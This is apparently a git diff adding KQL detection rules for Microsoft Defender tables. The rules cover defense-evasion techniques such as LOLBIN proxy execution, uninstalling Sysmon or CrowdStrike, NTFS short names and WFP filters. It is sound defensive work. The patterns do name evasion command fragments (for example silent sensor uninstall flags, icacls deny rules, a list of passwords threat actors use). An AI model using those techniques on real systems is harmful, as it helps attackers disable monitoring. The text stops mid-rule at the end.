Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents +| where (ProcessCommandLine contains "/fs:" and FolderPath endswith "\\format.com") and (not((ProcessCommandLine contains "/fs:exFAT" or ProcessCommandLine contains "/fs:FAT" or ProcessCommandLine contains "/fs:NTFS" or ProcessCommandLine contains "/fs:ReFS" or ProcessCommandLine contains "/fs:UDF"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uncommon_link_exe_parent_process.kql b/KQL/rules/Defense Evasion/uncommon_link_exe_parent_process.kql new file mode 100644 index 00000000..5e376ce7 --- /dev/null +++ b/KQL/rules/Defense Evasion/uncommon_link_exe_parent_process.kql @@ -0,0 +1,15 @@ +// Title: Uncommon Link.EXE Parent Process +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-22 +// Level: medium +// Description: Detects an uncommon parent process of "LINK.EXE". +Link.EXE in Microsoft incremental linker. Its a utility usually bundled with Visual Studio installation. +Multiple utilities often found in the same folder (editbin.exe, dumpbin.exe, lib.exe, etc) have a hardcode call to the "LINK.EXE" binary without checking its validity. +This would allow an attacker to sideload any binary with the name "link.exe" if one of the aforementioned tools get executed from a different location. +By filtering the known locations of such utilities we can spot uncommon parent process of LINK.EXE that might be suspicious or malicious. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents +| where (ProcessCommandLine contains "LINK /" and FolderPath endswith "\\link.exe") and (not(((InitiatingProcessFolderPath contains "\\VC\\bin\\" or InitiatingProcessFolderPath contains "\\VC\\Tools\\") and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Visual Studio\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uncommon_outbound_kerberos_connection.kql b/KQL/rules/Defense Evasion/uncommon_outbound_kerberos_connection.kql new file mode 100644 index 00000000..7bc7d4f3 --- /dev/null +++ b/KQL/rules/Defense Evasion/uncommon_outbound_kerberos_connection.kql @@ -0,0 +1,13 @@ +// Title: Uncommon Outbound Kerberos Connection +// Author: Ilyas Ochkov, oscd.community +// Date: 2019-10-24 +// Level: medium +// Description: Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.credential-access, attack.t1558, attack.lateral-movement, attack.t1550.003 +// False Positives: +// - Web Browsers and third party application might generate similar activity. An initial baseline is required. + +DeviceNetworkEvents +| where RemotePort == 88 and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\lsass.exe")) and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe", "C:\\Program Files\\Mozilla Firefox\\firefox.exe")) or InitiatingProcessFolderPath endswith "\\tomcat\\bin\\tomcat8.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uncommon_sigverif_exe_child_process.kql b/KQL/rules/Defense Evasion/uncommon_sigverif_exe_child_process.kql new file mode 100644 index 00000000..e5245706 --- /dev/null +++ b/KQL/rules/Defense Evasion/uncommon_sigverif_exe_child_process.kql @@ -0,0 +1,11 @@ +// Title: Uncommon Sigverif.EXE Child Process +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-19 +// Level: medium +// Description: Detects uncommon child processes spawning from "sigverif.exe", which could indicate potential abuse of the latter as a living of the land binary in order to proxy execution. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1216 + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\sigverif.exe" and (not((FolderPath in~ ("C:\\Windows\\System32\\WerFault.exe", "C:\\Windows\\SysWOW64\\WerFault.exe")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uncommon_svchost_parent_process.kql b/KQL/rules/Defense Evasion/uncommon_svchost_parent_process.kql new file mode 100644 index 00000000..5148e8ca --- /dev/null +++ b/KQL/rules/Defense Evasion/uncommon_svchost_parent_process.kql @@ -0,0 +1,10 @@ +// Title: Uncommon Svchost Parent Process +// Author: Florian Roth (Nextron Systems) +// Date: 2017-08-15 +// Level: medium +// Description: Detects an uncommon svchost parent process +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.005 + +DeviceProcessEvents +| where FolderPath endswith "\\svchost.exe" and (not(((InitiatingProcessFolderPath endswith "\\Mrt.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe" or InitiatingProcessFolderPath endswith "\\ngen.exe" or InitiatingProcessFolderPath endswith "\\rpcnet.exe" or InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\TiWorker.exe") or (InitiatingProcessFolderPath in~ ("-", "")) or isnull(InitiatingProcessFolderPath)))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uninstall_crowdstrike_falcon_sensor.kql b/KQL/rules/Defense Evasion/uninstall_crowdstrike_falcon_sensor.kql new file mode 100644 index 00000000..7bd9719b --- /dev/null +++ b/KQL/rules/Defense Evasion/uninstall_crowdstrike_falcon_sensor.kql @@ -0,0 +1,12 @@ +// Title: Uninstall Crowdstrike Falcon Sensor +// Author: frack113 +// Date: 2021-07-12 +// Level: high +// Description: Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Administrator might leverage the same command line for debugging or other purposes. However this action must be always investigated + +DeviceProcessEvents +| where ProcessCommandLine contains "\\WindowsSensor.exe" and ProcessCommandLine contains " /uninstall" and ProcessCommandLine contains " /quiet" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uninstall_sysinternals_sysmon.kql b/KQL/rules/Defense Evasion/uninstall_sysinternals_sysmon.kql new file mode 100644 index 00000000..5dea738a --- /dev/null +++ b/KQL/rules/Defense Evasion/uninstall_sysinternals_sysmon.kql @@ -0,0 +1,12 @@ +// Title: Uninstall Sysinternals Sysmon +// Author: frack113 +// Date: 2022-01-12 +// Level: high +// Description: Detects the removal of Sysmon, which could be a potential attempt at defense evasion +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Legitimate administrators might use this command to remove Sysmon for debugging purposes + +DeviceProcessEvents +| where (ProcessCommandLine contains "-u" or ProcessCommandLine contains "/u" or ProcessCommandLine contains "–u" or ProcessCommandLine contains "—u" or ProcessCommandLine contains "―u") and ((FolderPath endswith "\\Sysmon64.exe" or FolderPath endswith "\\Sysmon.exe") or ProcessVersionInfoFileDescription =~ "System activity monitor") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/unmount_share_via_net_exe.kql b/KQL/rules/Defense Evasion/unmount_share_via_net_exe.kql new file mode 100644 index 00000000..59fa3860 --- /dev/null +++ b/KQL/rules/Defense Evasion/unmount_share_via_net_exe.kql @@ -0,0 +1,12 @@ +// Title: Unmount Share Via Net.EXE +// Author: oscd.community, @redcanary, Zach Stanford @svch0st +// Date: 2020-10-08 +// Level: low +// Description: Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.005 +// False Positives: +// - Administrators or Power users may remove their shares via cmd line + +DeviceProcessEvents +| where (ProcessCommandLine contains "share" and ProcessCommandLine contains "/delete") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/use_icacls_to_hide_file_to_everyone.kql b/KQL/rules/Defense Evasion/use_icacls_to_hide_file_to_everyone.kql new file mode 100644 index 00000000..ad0992df --- /dev/null +++ b/KQL/rules/Defense Evasion/use_icacls_to_hide_file_to_everyone.kql @@ -0,0 +1,10 @@ +// Title: Use Icacls to Hide File to Everyone +// Author: frack113 +// Date: 2022-07-18 +// Level: medium +// Description: Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.001 + +DeviceProcessEvents +| where (ProcessCommandLine contains "/deny" and ProcessCommandLine contains "S-1-1-0:") and (ProcessVersionInfoOriginalFileName =~ "iCACLS.EXE" or FolderPath endswith "\\icacls.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/use_ntfs_short_name_in_command_line.kql b/KQL/rules/Defense Evasion/use_ntfs_short_name_in_command_line.kql new file mode 100644 index 00000000..5b5c1d72 --- /dev/null +++ b/KQL/rules/Defense Evasion/use_ntfs_short_name_in_command_line.kql @@ -0,0 +1,12 @@ +// Title: Use NTFS Short Name in Command Line +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-05 +// Level: medium +// Description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.004 +// False Positives: +// - Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process. + +DeviceProcessEvents +| where (ProcessCommandLine contains "~1.exe" or ProcessCommandLine contains "~1.bat" or ProcessCommandLine contains "~1.msi" or ProcessCommandLine contains "~1.vbe" or ProcessCommandLine contains "~1.vbs" or ProcessCommandLine contains "~1.dll" or ProcessCommandLine contains "~1.ps1" or ProcessCommandLine contains "~1.js" or ProcessCommandLine contains "~1.hta" or ProcessCommandLine contains "~2.exe" or ProcessCommandLine contains "~2.bat" or ProcessCommandLine contains "~2.msi" or ProcessCommandLine contains "~2.vbe" or ProcessCommandLine contains "~2.vbs" or ProcessCommandLine contains "~2.dll" or ProcessCommandLine contains "~2.ps1" or ProcessCommandLine contains "~2.js" or ProcessCommandLine contains "~2.hta") and (not(((InitiatingProcessFolderPath endswith "\\WebEx\\WebexHost.exe" or InitiatingProcessFolderPath endswith "\\thor\\thor64.exe") or ProcessCommandLine contains "C:\\xampp\\vcredist\\VCREDI~1.EXE"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/use_ntfs_short_name_in_image.kql b/KQL/rules/Defense Evasion/use_ntfs_short_name_in_image.kql new file mode 100644 index 00000000..f6793daf --- /dev/null +++ b/KQL/rules/Defense Evasion/use_ntfs_short_name_in_image.kql @@ -0,0 +1,12 @@ +// Title: Use NTFS Short Name in Image +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-06 +// Level: medium +// Description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.004 +// False Positives: +// - Software Installers + +DeviceProcessEvents +| where (FolderPath contains "~1.bat" or FolderPath contains "~1.dll" or FolderPath contains "~1.exe" or FolderPath contains "~1.hta" or FolderPath contains "~1.js" or FolderPath contains "~1.msi" or FolderPath contains "~1.ps1" or FolderPath contains "~1.tmp" or FolderPath contains "~1.vbe" or FolderPath contains "~1.vbs" or FolderPath contains "~2.bat" or FolderPath contains "~2.dll" or FolderPath contains "~2.exe" or FolderPath contains "~2.hta" or FolderPath contains "~2.js" or FolderPath contains "~2.msi" or FolderPath contains "~2.ps1" or FolderPath contains "~2.tmp" or FolderPath contains "~2.vbe" or FolderPath contains "~2.vbs") and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\explorer.exe")) and (not((InitiatingProcessFolderPath endswith "\\thor\\thor64.exe" or FolderPath endswith "\\VCREDI~1.EXE" or InitiatingProcessFolderPath endswith "\\WebEx\\WebexHost.exe" or FolderPath =~ "C:\\PROGRA~1\\WinZip\\WZPREL~1.EXE"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/use_of_remote_exe.kql b/KQL/rules/Defense Evasion/use_of_remote_exe.kql new file mode 100644 index 00000000..5c626cf3 --- /dev/null +++ b/KQL/rules/Defense Evasion/use_of_remote_exe.kql @@ -0,0 +1,12 @@ +// Title: Use of Remote.exe +// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io +// Date: 2022-06-02 +// Level: medium +// Description: Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1127 +// False Positives: +// - Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg). + +DeviceProcessEvents +| where FolderPath endswith "\\remote.exe" or ProcessVersionInfoOriginalFileName =~ "remote.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/use_of_scriptrunner_exe.kql b/KQL/rules/Defense Evasion/use_of_scriptrunner_exe.kql new file mode 100644 index 00000000..d7c98ec2 --- /dev/null +++ b/KQL/rules/Defense Evasion/use_of_scriptrunner_exe.kql @@ -0,0 +1,12 @@ +// Title: Use of Scriptrunner.exe +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-01 +// Level: medium +// Description: The "ScriptRunner.exe" binary can be abused to proxy execution through it and bypass possible whitelisting +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1218 +// False Positives: +// - Legitimate use when App-v is deployed + +DeviceProcessEvents +| where ProcessCommandLine contains " -appvscript " and (FolderPath endswith "\\ScriptRunner.exe" or ProcessVersionInfoOriginalFileName =~ "ScriptRunner.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/use_of_the_sftp_exe_binary_as_a_lolbin.kql b/KQL/rules/Defense Evasion/use_of_the_sftp_exe_binary_as_a_lolbin.kql new file mode 100644 index 00000000..64aa3ad8 --- /dev/null +++ b/KQL/rules/Defense Evasion/use_of_the_sftp_exe_binary_as_a_lolbin.kql @@ -0,0 +1,10 @@ +// Title: Use Of The SFTP.EXE Binary As A LOLBIN +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-11-10 +// Level: medium +// Description: Detects the usage of the "sftp.exe" binary as a LOLBIN by abusing the "-D" flag +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1218 + +DeviceProcessEvents +| where (ProcessCommandLine contains " -D .." or ProcessCommandLine contains " -D C:\\") and FolderPath endswith "\\sftp.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/use_of_ttdinject_exe.kql b/KQL/rules/Defense Evasion/use_of_ttdinject_exe.kql new file mode 100644 index 00000000..e1a365f2 --- /dev/null +++ b/KQL/rules/Defense Evasion/use_of_ttdinject_exe.kql @@ -0,0 +1,12 @@ +// Title: Use of TTDInject.exe +// Author: frack113 +// Date: 2022-05-16 +// Level: medium +// Description: Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1127 +// False Positives: +// - Legitimate use + +DeviceProcessEvents +| where FolderPath endswith "ttdinject.exe" or ProcessVersionInfoOriginalFileName =~ "TTDInject.EXE" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/use_of_visualuiaverifynative_exe.kql b/KQL/rules/Defense Evasion/use_of_visualuiaverifynative_exe.kql new file mode 100644 index 00000000..4baa59bb --- /dev/null +++ b/KQL/rules/Defense Evasion/use_of_visualuiaverifynative_exe.kql @@ -0,0 +1,12 @@ +// Title: Use of VisualUiaVerifyNative.exe +// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io +// Date: 2022-06-01 +// Level: medium +// Description: VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate testing of Microsoft UI parts. + +DeviceProcessEvents +| where FolderPath endswith "\\VisualUiaVerifyNative.exe" or ProcessVersionInfoOriginalFileName =~ "VisualUiaVerifyNative.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/use_of_vsiisexelauncher_exe.kql b/KQL/rules/Defense Evasion/use_of_vsiisexelauncher_exe.kql new file mode 100644 index 00000000..11a3ceae --- /dev/null +++ b/KQL/rules/Defense Evasion/use_of_vsiisexelauncher_exe.kql @@ -0,0 +1,10 @@ +// Title: Use of VSIISExeLauncher.exe +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-09 +// Level: medium +// Description: The "VSIISExeLauncher.exe" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1127 + +DeviceProcessEvents +| where (ProcessCommandLine contains " -p " or ProcessCommandLine contains " -a ") and (FolderPath endswith "\\VSIISExeLauncher.exe" or ProcessVersionInfoOriginalFileName =~ "VSIISExeLauncher.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/use_of_wfc_exe.kql b/KQL/rules/Defense Evasion/use_of_wfc_exe.kql new file mode 100644 index 00000000..c440a601 --- /dev/null +++ b/KQL/rules/Defense Evasion/use_of_wfc_exe.kql @@ -0,0 +1,12 @@ +// Title: Use of Wfc.exe +// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io +// Date: 2022-06-01 +// Level: medium +// Description: The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1127 +// False Positives: +// - Legitimate use by a software developer + +DeviceProcessEvents +| where FolderPath endswith "\\wfc.exe" or ProcessVersionInfoOriginalFileName =~ "wfc.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/use_short_name_path_in_image.kql b/KQL/rules/Defense Evasion/use_short_name_path_in_image.kql new file mode 100644 index 00000000..0b23b5b7 --- /dev/null +++ b/KQL/rules/Defense Evasion/use_short_name_path_in_image.kql @@ -0,0 +1,12 @@ +// Title: Use Short Name Path in Image +// Author: frack113, Nasreddine Bencherchali +// Date: 2022-08-07 +// Level: medium +// Description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image detection +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.004 +// False Positives: +// - Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process. + +DeviceProcessEvents +| where (FolderPath contains "~1\\" or FolderPath contains "~2\\") and (not((((FolderPath contains "\\AppData\\" and FolderPath contains "\\Temp\\") or (FolderPath endswith "~1\\unzip.exe" or FolderPath endswith "~1\\7zG.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\Dism.exe", "C:\\Windows\\System32\\cleanmgr.exe"))))) and (not(((ProcessVersionInfoProductName =~ "InstallShield (R)" or ProcessVersionInfoFileDescription =~ "InstallShield (R) Setup Engine" or ProcessVersionInfoCompanyName =~ "InstallShield Software Corporation") or InitiatingProcessFolderPath endswith "\\thor\\thor64.exe" or InitiatingProcessFolderPath endswith "\\WebEx\\WebexHost.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/utilityfunctions_ps1_proxy_dll.kql b/KQL/rules/Defense Evasion/utilityfunctions_ps1_proxy_dll.kql new file mode 100644 index 00000000..bd08cdeb --- /dev/null +++ b/KQL/rules/Defense Evasion/utilityfunctions_ps1_proxy_dll.kql @@ -0,0 +1,10 @@ +// Title: UtilityFunctions.ps1 Proxy Dll +// Author: frack113 +// Date: 2022-05-28 +// Level: medium +// Description: Detects the use of a Microsoft signed script executing a managed DLL with PowerShell. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1216 + +DeviceProcessEvents +| where ProcessCommandLine contains "UtilityFunctions.ps1" or ProcessCommandLine contains "RegSnapin " \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/verclsid_exe_runs_com_object.kql b/KQL/rules/Defense Evasion/verclsid_exe_runs_com_object.kql new file mode 100644 index 00000000..60a0d7e0 --- /dev/null +++ b/KQL/rules/Defense Evasion/verclsid_exe_runs_com_object.kql @@ -0,0 +1,10 @@ +// Title: Verclsid.exe Runs COM Object +// Author: Victor Sergeev, oscd.community +// Date: 2020-10-09 +// Level: medium +// Description: Detects when verclsid.exe is used to run COM object via GUID +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "/S" and ProcessCommandLine contains "/C") and (FolderPath endswith "\\verclsid.exe" or ProcessVersionInfoOriginalFileName =~ "verclsid.exe")) and (not(((ProcessCommandLine contains "verclsid.exe\" /S /C {" and ProcessCommandLine contains "} /I {") and InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\RuntimeBroker.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/virtualbox_driver_installation_or_starting_of_vms.kql b/KQL/rules/Defense Evasion/virtualbox_driver_installation_or_starting_of_vms.kql new file mode 100644 index 00000000..bc434146 --- /dev/null +++ b/KQL/rules/Defense Evasion/virtualbox_driver_installation_or_starting_of_vms.kql @@ -0,0 +1,12 @@ +// Title: Virtualbox Driver Installation or Starting of VMs +// Author: Janantha Marasinghe +// Date: 2020-09-26 +// Level: low +// Description: Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.006, attack.t1564 +// False Positives: +// - This may have false positives on hosts where Virtualbox is legitimately being used for operations + +DeviceProcessEvents +| where (ProcessCommandLine contains "VBoxRT.dll,RTR3Init" or ProcessCommandLine contains "VBoxC.dll" or ProcessCommandLine contains "VBoxDrv.sys") or (ProcessCommandLine contains "startvm" or ProcessCommandLine contains "controlvm") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/visual_basic_command_line_compiler_usage.kql b/KQL/rules/Defense Evasion/visual_basic_command_line_compiler_usage.kql new file mode 100644 index 00000000..be703a9c --- /dev/null +++ b/KQL/rules/Defense Evasion/visual_basic_command_line_compiler_usage.kql @@ -0,0 +1,12 @@ +// Title: Visual Basic Command Line Compiler Usage +// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative +// Date: 2020-10-07 +// Level: high +// Description: Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027.004 +// False Positives: +// - Utilization of this tool should not be seen in enterprise environment + +DeviceProcessEvents +| where FolderPath endswith "\\cvtres.exe" and InitiatingProcessFolderPath endswith "\\vbc.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/wab_execution_from_non_default_location.kql b/KQL/rules/Defense Evasion/wab_execution_from_non_default_location.kql new file mode 100644 index 00000000..be902c9a --- /dev/null +++ b/KQL/rules/Defense Evasion/wab_execution_from_non_default_location.kql @@ -0,0 +1,10 @@ +// Title: Wab Execution From Non Default Location +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-12 +// Level: high +// Description: Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution + +DeviceProcessEvents +| where (FolderPath endswith "\\wab.exe" or FolderPath endswith "\\wabmig.exe") and (not((FolderPath startswith "C:\\Windows\\WinSxS\\" or FolderPath startswith "C:\\Program Files\\Windows Mail\\" or FolderPath startswith "C:\\Program Files (x86)\\Windows Mail\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/wab_wabmig_unusual_parent_or_child_processes.kql b/KQL/rules/Defense Evasion/wab_wabmig_unusual_parent_or_child_processes.kql new file mode 100644 index 00000000..593ea03a --- /dev/null +++ b/KQL/rules/Defense Evasion/wab_wabmig_unusual_parent_or_child_processes.kql @@ -0,0 +1,10 @@ +// Title: Wab/Wabmig Unusual Parent Or Child Processes +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-12 +// Level: high +// Description: Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution + +DeviceProcessEvents +| where (InitiatingProcessFolderPath endswith "\\wab.exe" or InitiatingProcessFolderPath endswith "\\wabmig.exe") or ((FolderPath endswith "\\wab.exe" or FolderPath endswith "\\wabmig.exe") and (InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/weak_or_abused_passwords_in_cli.kql b/KQL/rules/Defense Evasion/weak_or_abused_passwords_in_cli.kql new file mode 100644 index 00000000..9c84f6ec --- /dev/null +++ b/KQL/rules/Defense Evasion/weak_or_abused_passwords_in_cli.kql @@ -0,0 +1,15 @@ +// Title: Weak or Abused Passwords In CLI +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-14 +// Level: medium +// Description: Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. +An example would be a threat actor creating a new user via the net command and providing the password inline + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution +// False Positives: +// - Legitimate usage of the passwords by users via commandline (should be discouraged) +// - Other currently unknown false positives + +DeviceProcessEvents +| where ProcessCommandLine contains "123456789" or ProcessCommandLine contains "123123qwE" or ProcessCommandLine contains "Asd123.aaaa" or ProcessCommandLine contains "Decryptme" or ProcessCommandLine contains "P@ssw0rd!" or ProcessCommandLine contains "Pass8080" or ProcessCommandLine contains "password123" or ProcessCommandLine contains "test@202" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/wfp_filter_added_via_registry.kql b/KQL/rules/Defense Evasion/wfp_filter_added_via_registry.kql new file mode 100644 index 00000000..3039937b --- /dev/null +++ b/KQL/rules/Defense Evasion/wfp_filter_added_via_registry.kql @@ -0,0 +1,11 @@ +// Title: WFP Filter Added via Registry +// Author: Frack113 +// Date: 2025-10-23 +// Level: medium +// Description: Detects registry modifications that add Windows Filtering Platform (WFP) filters, which may be used to block security tools and EDR agents from reporting events. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1562, attack.t1569.002 + +DeviceRegistryEvents +| where RegistryKey endswith "\\BFE\\Parameters\\Policy\\Persistent\\Filter*" and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\svchost.exe", "C:\\Windows\\SysWOW64\\svchost.exe")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/windows_binaries_write_suspicious_extensions.kql b/KQL/rules/Defense Evasion/windows_binaries_write_suspicious_extensions.kql new file mode 100644 index 00000000..2858ebb0 --- /dev/null +++ b/KQL/rules/Defense Evasion/windows_binaries_write_suspicious_extensions.kql @@ -0,0 +1,10 @@ +// Title: Windows Binaries Write Suspicious Extensions +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-12 +// Level: high +// Description: Detects Windows executables that write files with suspicious extensions +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036 + +DeviceFileEvents +| where (((InitiatingProcessFolderPath endswith "\\csrss.exe" or InitiatingProcessFolderPath endswith "\\lsass.exe" or InitiatingProcessFolderPath endswith "\\RuntimeBroker.exe" or InitiatingProcessFolderPath endswith "\\sihost.exe" or InitiatingProcessFolderPath endswith "\\smss.exe" or InitiatingProcessFolderPath endswith "\\wininit.exe" or InitiatingProcessFolderPath endswith "\\winlogon.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".iso" or FolderPath endswith ".ps1" or FolderPath endswith ".txt" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs")) or ((InitiatingProcessFolderPath endswith "\\dllhost.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".hta" or FolderPath endswith ".iso" or FolderPath endswith ".ps1" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs"))) and (not(((InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\dllhost.exe" and (FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\Local\\Temp\\__PSScriptPolicyTest_") and FolderPath endswith ".ps1") or (InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe" and (FolderPath contains "C:\\Program Files\\WindowsApps\\Clipchamp" and FolderPath contains ".ps1")) or ((InitiatingProcessFolderPath in~ ("C:\\Windows\\system32\\svchost.exe", "C:\\Windows\\SysWOW64\\svchost.exe")) and FolderPath endswith ".ps1" and (FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview" or FolderPath startswith "C:\\Program Files (x86)\\WindowsApps\\Microsoft.PowerShellPreview")) or (InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe" and (FolderPath contains "C:\\Windows\\System32\\GroupPolicy\\DataStore\\" and FolderPath contains "\\sysvol\\" and FolderPath contains "\\Policies\\" and FolderPath contains "\\Machine\\Scripts\\Startup\\") and (FolderPath endswith ".ps1" or FolderPath endswith ".bat"))))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/windows_defender_context_menu_removed.kql b/KQL/rules/Defense Evasion/windows_defender_context_menu_removed.kql new file mode 100644 index 00000000..d73e7171 --- /dev/null +++ b/KQL/rules/Defense Evasion/windows_defender_context_menu_removed.kql @@ -0,0 +1,15 @@ +// Title: Windows Defender Context Menu Removed +// Author: Matt Anderson (Huntress) +// Date: 2025-07-09 +// Level: high +// Description: Detects the 